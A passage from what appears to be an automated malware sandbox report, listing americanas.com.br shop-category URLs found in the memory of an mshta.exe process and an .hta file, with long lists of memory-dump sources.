00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574087890.00000000095DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/beleza-e-perfumaria?chave=pfm_home_beleza_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577325605.000000000A988000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A987000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574087890.00000000095DF000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/bem-estar-sexual?chave=pfm_home_bemestarsexual_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554972564.0000000009724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575317065.0000000009728000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542078121.0000000009722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/brinquedos/bonecas/reborn
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541515073.000000000953E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558658695.00000000095A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506644684.000000000BE61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573614739.00000000095AB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508140072.000000000ABBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502799829.000000000BE56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557426752.00000000095A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/brinquedos/lego
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579155988.000000000BE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/brinquedos?chave=pfm_home_brinquedos_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/cama-mesa-e-banho?chave=dk_hm_at_cameba
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/cama-mesa-e-banho?chave=pfm_home_cameba_menu
Source: mshta.exe, 00000001.00000003.12567033771.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/cameras
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/cameras-e-drones?chave=pfm_home_cameras_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/casa-e-construcao?chave=pfm_home_construcao_menu
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558057036.000000000A98D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A987000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541754594.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12549952415.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510715620.000000000BE7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/acessorios-para-celular?chave=pfm_hm
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000BFF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510777921.00000000096F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/celular-basico?chave=pfm_hm_tt_1_0_c
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12399441552.00000000069FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12401910650.00000000069F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12401959077.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/pecas-para-celular?chave=pfm_hm_tt_1
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551427723.000000000C051000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556317603.000000000C052000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C051000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579886236.000000000C052000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555082549.000000000C051000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573530715.0000000009530000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/smartphone/iphone?ordenacao=topSelli
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509110042.00000000095FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512897588.00000000095FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511109691.00000000095FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12485820978.0000000009DA1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566725542.0000000009602000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones/smartphone?chave=pfm_hm_tt_1_0_smart
